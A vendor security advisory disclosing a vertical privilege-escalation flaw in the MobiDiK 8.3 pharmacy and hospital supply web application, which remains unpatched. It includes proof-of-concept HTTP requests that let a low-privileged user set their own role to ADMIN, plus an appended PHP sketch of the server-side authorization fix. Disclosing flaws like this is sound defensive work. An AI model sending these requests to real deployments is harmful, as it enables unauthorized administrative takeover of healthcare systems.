Advisory ID: SYSS-2025-058
Product: MobiDiK
Manufacturer: Richard Müller GmbH
Affected Version(s): 8.3
Tested Version(s): 8.3
Vulnerability Type: Incorrect Authorization (CWE-863)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2025-09-26
Solution Date: -
Public Disclosure: 2025-12-12
CVE Reference: Not yet assigned
Author of Advisory: Dennis Caliskan, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

MobiDiK is a web shop for pharmacy supplies. The manufacturer describes the product as follows (see [1]):

"Since 1985, MobiDiK (Mobile Datenerfassung im Krankenhaus) has been networking hospital processes using mobile scanners for the benefit of staff on the wards, in the warehouse, and in the pharmacy. [...] MobiDiK is a modular solution that makes it possible to map all customer structures, from large university hospitals to decentralized solutions for logistics companies, using a single system."

Due to incorrectly implemented authorization checks, the web application is vulnerable to vertical privilege escalation.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

In the web application's back end, some authorization checks are either performed incorrectly or are missing completely.

In the user management settings, an administrator can assign roles to individual users. The underlying HTTP POST request that sets user privileges is also accepted by the web server when it is sent by a low-privileged user, and the privileges are changed accordingly. A low-privileged user can thus escalate their privileges and grant themselves administrative privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Log in to the web application as a low-privileged user and observe the corresponding PHP session ID generated by the web application.

2. Send the following HTTP GET request to the web server.
Replace the session ID parameter with your own session ID. The tenant ID identifies which organization your account belongs to. You get the tenant ID by observing the "inst" parameter in the URL when accessing the login page. This parameter takes a string consisting of two parts, e.g. . It is not clear what the first part stands for; however, the second part identifies the tenant and is your ID.

GET /cx_tab_tab.php?PHPSESSID=&cdx=BENUTZER.CDX&p0=&modus=laden&sw=| HTTP/2
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Priority: u=4
Te: trailers

3. Send the following HTTP POST request to the web server. Replace the session ID parameter with your own session ID. This request will set the user privileges.

POST /db_s.php HTTP/2
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Priority: u=4
Te: trailers

sql=&titel=&sw=%7C%7C%7C%7CADMIN%7C%7C%7C%7C0%7C31.12.2099%7C0&tsw=A%7EHDZ9270%7E0%7CL%7EHDZ9270%7E0&PHPSESSID=&cdx=BENUTZER.CDX&modus=speichern

4. Log out, reauthenticate in the web application and observe the button in the top left corner. It is now clickable. Click it and select "Administration".

5. You now have administrative control over the web application. For example, you can manage user accounts or restrict access to the web application for specific tenants.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Secure all security-relevant functions through server-side authorization checks in the back end. Make sure that the user has sufficient privileges to issue the request.
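As an added example that is not MobiDiK or vendor code, the following PHP sketch shows the kind of server-side check the solution calls for: the caller's role is read from the server-side session, and a save ("speichern") to the user table (BENUTZER.CDX) is refused unless that role is ADMIN. The policy table, session key and handler names are assumptions; the cdx, modus and sw values mirror the advisory.

```php
<?php
// Added example, not MobiDiK code. WRITE_POLICY, $session['role'] and the
// handler functions are assumptions; cdx/modus/sw mirror the advisory.
declare(strict_types=1);

// Assumed policy: which session roles may write ("speichern") which table.
// BENUTZER.CDX holds user accounts and roles, so only ADMIN may write it.
const WRITE_POLICY = [
    'BENUTZER.CDX'   => ['ADMIN'],
    'BESTELLUNG.CDX' => ['ADMIN', 'USER'],   // assumed ordinary data table
];

// The caller's role comes from the server-side session only. The role
// string inside the "sw" form field is data to be stored, not proof of
// who is sending the request.
function callerRole(array $session): ?string {
    $r = $session['role'] ?? null;
    return is_string($r) ? $r : null;
}

// Deny by default: unknown role, mode or table all return false.
function isAuthorized(array $session, string $cdx, string $modus): bool {
    $role = callerRole($session);
    if ($role === null)         { return false; }  // not logged in
    if ($modus === 'laden')     { return true;  }  // read: assumed open to any logged-in user
    if ($modus !== 'speichern') { return false; }
    return in_array($role, WRITE_POLICY[$cdx] ?? [], true);
}

// Vulnerable pattern (what the advisory describes): the save is performed
// for whoever sends the POST, so the client-chosen role is stored as-is.
function handleSaveVulnerable(array $session, array $post): string {
    return 'saved ' . $post['cdx'] . ' -> ' . $post['sw'];
}

// Hardened pattern: authorize before touching the database; the denial
// log line also gives detection a signal for escalation attempts.
function handleSaveHardened(array $session, array $post): string {
    $cdx   = (string)($post['cdx'] ?? '');
    $modus = (string)($post['modus'] ?? '');
    if (!isAuthorized($session, $cdx, $modus)) {
        error_log(sprintf('authz denied role=%s cdx=%s modus=%s',
                          callerRole($session) ?? 'none', $cdx, $modus));
        return 'forbidden';   // a web handler would send HTTP 403 here
    }
    return 'saved ' . $cdx . ' -> ' . (string)($post['sw'] ?? '');
}

// Constructed demo: a USER session replaying the role-setting POST.
$post = ['cdx' => 'BENUTZER.CDX', 'modus' => 'speichern',
         'sw'  => '||||ADMIN||||0|31.12.2099|0'];
echo handleSaveVulnerable(['role' => 'USER'], $post), "\n";  // saved: escalation
echo handleSaveHardened(['role' => 'USER'], $post), "\n";    // forbidden
```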
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-09-19: Vulnerability discovered
2025-09-26: Vulnerability reported to manufacturer
2025-10-06: Vulnerability reported to manufacturer again
2025-12-08: To date, the vendor has not replied to the inquiry
2025-12-12: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for MobiDiK
    http://www.richard-mueller.de/gesundheitswesen/startseite-gesundheitswesen/
[2] SySS Security Advisory SYSS-2025-058
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-058.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dennis Caliskan of SySS GmbH.

E-Mail: dennis.caliskan@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Dennis_Caliskan.asc
Key ID: 0x5E916BF585867B55
Key Fingerprint: 52ED 2BF9 15D9 4965 854A 8336 5E91 6BF5 8586 7B55

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en